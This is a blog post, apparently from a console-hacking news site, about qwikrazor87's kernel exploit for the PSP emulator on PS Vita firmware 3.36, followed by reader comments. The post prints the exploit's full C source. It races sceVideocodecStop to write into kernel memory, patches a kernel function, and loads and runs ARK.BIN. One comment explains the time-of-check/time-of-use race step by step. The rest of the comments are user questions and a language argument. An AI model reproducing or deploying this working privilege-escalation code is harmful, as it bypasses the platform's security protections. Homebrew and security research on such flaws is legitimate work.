Qwikrazor87 releases source code for the Vita Firmware 3.36 (PSP emulator) Kernel exploit
A few days ago, Qwikrazor87 released the source code for his PSP Kernel exploit running on Vita Firmware 3.36.
Although the release will probably be of no interest for most end users, for those of you with a bit of PSP programming knowledge, or interested in hacking, this is always cool bits of information.
The exploit uses a vulnerability in function sceVideocodecStop. Qwikrazor had hinted at this vulnerability back in January:
props to anyone that can exploit sceVideocodecStop on 3.30+ (which will then allow the other “patched” exploits to work) 😀
— qwikrazor87 (@qwikrazor87) January 29, 2015
The vulnerability involves filling a video buffer with specific content, and seems to rely on some race condition where the content of the buffer gets modified in a separate thread while sceVideoCodecStop is being called.
Too advanced for me, especially with no direct access to the actual implementation of sceVideoCodecStop, but it’s always interesting to look at.
#include
u32 sceMeCodecWrapper = 0x88136800, sw_address = 0;
int is_exploited = 0, running = 1;
u32 a0[24];
int storethread()
{
while (running == 1) {
a0[11] = sw_address;
sceKernelDelayThread(1);
}
sceKernelExitThread(0);
}
void KernelContent()
{
is_exploited = 1;
__asm("move $k1, $0;");
//"restore" me_wrapper mutex UID
SceUID (* _sceKernelCreateMutex)(const char *name, u32 attr, int init_count, void *options) = \
(void *)FindExport("sceThreadManager", "ThreadManForUser", 0xB7D098C6);
SceUID mutex = _sceKernelCreateMutex("SceKermitMe", 256, 0, NULL);
_sw(mutex, sceMeCodecWrapper + 0x2F80);
//sceKernelLibcTime - pass address of kernel function in first arg, restored later in ARK code. |:
_sw(0x00800008, 0x8800F9C4); //jr $a0
_sw(0, 0x8800F9C8); //nop
void (* _sceKernelDcacheWritebackInvalidateAll)(void) = (void *)0x88000744;
void (* _sceKernelIcacheInvalidateAll)(void) = (void *)0x88000E98;
_sceKernelDcacheWritebackInvalidateAll();
_sceKernelIcacheInvalidateAll();
}
void do_exploit()
{
is_exploited = 0;
running = 1;
sw_address = (sceMeCodecWrapper + 0x2F80) - 36;
SceUID thid = sceKernelCreateThread("thid", storethread, 8, 512, THREAD_ATTR_USER, NULL);
sceKernelStartThread(thid, 0, NULL);
sceUtilityLoadModule(0x300);
sceUtilityLoadModule(0x303);
int (* sceVideocodecStop)(u32 *a0, int a1) = (void *)FindImport("sceVideocodec", 0xA2F0564E, 0);
memset(a0, 0, sizeof(a0));
a0[0] = 0x05100601;
a0[15] = 1;
int i;
while (a0[2] != 0x800201C3) {
a0[15] = 1;
a0[3] = 0x09000000;
a0[4] = 0x09000000;
a0[2] = 0;
a0[11] = 0x09000000;
sceVideocodecStop(a0, 0);
}
fillvram(-1);
sw_address = 0x8800F9C4 - 36;
int (* _sceKernelLibcTime)(u32, u32) = (void *)sceKernelLibcTime;
while (is_exploited != 1) {
a0[15] = 1;
a0[11] = 0x09000000;
a0[3] = 0x09000000;
a0[4] = 0x09000000;
sceVideocodecStop(a0, 0);
sceKernelDcacheWritebackAll();
_sceKernelLibcTime(0x08800000, ((u32)&KernelContent | 0x80000000));
}
fillvram(0xFF00);
running = 0;
u8 buf[0x4000];
SceUID fd = sceIoOpen("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/ARK.BIN", PSP_O_RDONLY, 0777);
sceIoRead(fd, buf, sizeof(buf));
sceIoClose(fd);
memcpy((void *)0x10000, buf, sizeof(buf));
sceKernelDcacheWritebackAll();
void (* Start)(const char *) = (void *)0x10000;
Start("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/");
}
void _start() __attribute__ ((section (".text.start")));
void _start()
{
fillvram(0x80808080);
do_exploit();
sceKernelExitGame();
}
source: Qwikrazor87
Primera
Only psp games:(:(:(?
Hope there will be a chance for Ben10 Alien Force: Vilgax Attack to work…. the only one that I’ve got.
Interesting to see what the actual code of an exploit looks like even though I am unfamiliar with the language its written in.
I hope this PSP emulator is can play with Pangya Fantasy Golf game too.
Hmm, I was about to sell my 3.5 vita so I could buy a vita with 2.18 firmware.
I don’t understand the technical details of this post but doesn’t kernel access on 3.6 and below mean we could eventually run ps vita roms?
Should I sell my vita? :'( im so confused.
this is a psp exploit, running in the psp emulator of the vita. Not an actual vita exploit.
The amount of clueless people i see on this site everyday is simply astonishing. There was nothing here that suggested a vita kernel exploit at all. Cant believe this guy.
i am unable to undrestand c++ :((
This is C, not C++. There’s a big difference: C doesn’t have a crappy OOP design from the 90’s.
Haha, heck yes!, C FTW
You really thing bashing a language was necessary? Each language has its pros and cons.
Yes, I have. There is absolutely no reason for C++ to miss out on modern OOP designs that are proven over and over again that are much better than 90’s OOP designs: properties are much better than private attributes with getters/setters, abstract/virtual methods overcomplicate things and add no extra value, private members should not be disallowed access on subclasses, that just prevents proper code-reuse, and many more things. After programming in SO MANY languages I can tell you what is a good language design choice that helps programmers write better code faster and easier and what is simply annoying and adds no value or complicates things.
Unfortunately these languages with bad design choices are language created in the 90’s when every programmer was theorizing on OOP without thinking if it was going to be any good.
This is one of the many race condition exploits that the PSP’s kernel has.
The targetted function loads an offset twice, the first time to check it for validity (check that it isn’t bigger than a given amount) and the second time to actually use it by adding it to an address.
What the code does is create a thread to hopefully change this offset to a big number after the check but before the actual usage, this turns the resulting address into a kernel one where we can override parts of kernel ram.
We basically want this:
– Thread 1: sets the offset to a valid amount, calls the function, the function checks the offset and it passes.
– Thread 2: changes the offset to an invalid value that gives you a kernel address when added to the user address.
– Thread 1: loads the (now invalid) offset again and adds it to the user address.
Due to the undeterministic properties of threads, this may or may not happen in the order that we want, so we have to have some loop that keeps trying until it works.
sup wololo,im Dark hazama but Call me DHZ for short,i have a ps vita 3.18 version,im not going to upgrade or anything cuz of sony taking out all the exploited games,i know you guys work really hard on this developer programs,(i never use the word hacker,dont like it)and you guys rock on what u do,i hope Zett could do like and update for gladiator begins,i have that exploited game thanks to The Zett,my regards to him,if he can bring the exploit file for that game and turn it into for 3.36,that be awsome,cuz i could update with no problem and everyone else would as well.
Why do you want to update? You’ll miss your chance for a native CFW if the webkit exploit (that gets patched after 3.18) leads to something good.
Looks amazing. A couple lines of code that change a little bit of values in RAM and boom, exploit is done. I wonder, how much time went into actually getting to this code…
Maybe the exact same amount of time and luck, system wide exploit requires to appear?
Writing the exploit code itself doesn’t take very long, the time consuming part is actually finding the kexploit in the MIPS disassembly of the firmware.
Yeah, I know. It just looks funny – all great things have little code, but huge impact and require a *** ton of time to make with 90% of a time being consumed by thinking.
I’ve just posted a reverse of the involved syscall and subs in the forums with an explanation
So does this mean we can use old exploit games now?
test
The awaiting moderation thing is so irritating. |:
keep up the good work 🙂
It’s very unsightly to see people bash on c++, I’m pretty sure c has its cons too, and c++ was developed as a means to solve underlying issues programmers were having such as encapsulation.
How is encapsulation an issue? Encapsulation is a programming technique that helps developers know what data is sensitive and shouldn’t be used inappropriately.
And encapsulation existed LONG before C++, C++ doesn’t add anything that C can’t have, it only overcomplicates things.
Well, for some reason Java is used more than C++ (maybe because of its easiness) but Oh look! C is at the top.
http://www.tiobe.com/index.php/content/paperinfo/tpci/index.html
What I like about C is that it is a really small programming language, easy to use and also you can easily create complex and large applications right away.
Just look at their popular reference books K&R is like 300 pages long and Stroustrup’s book is about a 1000 pages long, so if you need to write an useful application right away it’s kind of impossible.
And about encapsulation (and other stuff), they’re just design topics that depend mostly on the programmer, if you know what you’re doing you can implement them.
do the psvita pspemulator exploits allso work on ps3’s pspemulator wololo ?
if so howto change the backup without idps andso that game+exploit are injected ?